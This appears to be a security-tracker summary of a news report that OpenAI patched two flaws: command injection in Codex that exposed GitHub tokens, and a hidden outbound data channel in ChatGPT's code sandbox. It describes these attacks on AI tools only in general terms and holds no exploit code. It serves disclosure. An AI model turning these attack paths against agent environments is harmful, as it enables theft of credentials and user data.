OpenAI patches twin leaks as Codex slips and ChatGPT spills
Summary
OpenAI patched two separate security flaws in its AI tools: one in Codex (a coding agent) that allowed attackers to steal GitHub tokens through command injection (inserting malicious commands into user inputs), and another in ChatGPT's code execution environment that created a hidden channel for silently leaking user data without approval. Both bugs could let attackers extract sensitive information, but researchers warn that giving AI tools the ability to run code and access external systems inherently creates ongoing security risks.
Solution / Mitigation
OpenAI fixed the Codex vulnerability by 'tightening input validation around the vulnerable parameter and hardening how commands are constructed in the execution environment.' For the ChatGPT flaw, OpenAI addressed it by 'tightening controls around outbound communication in the code execution environment.' Both patches were deployed before public disclosure.
Classification
Affected Vendors
Related Issues
Original source: https://www.csoonline.com/article/4152393/openai-patches-twin-leaks-as-codex-slips-and-chatgpt-spills.html
First tracked: March 31, 2026 at 02:00 PM
Classified by LLM (prompt v3) · confidence: 92%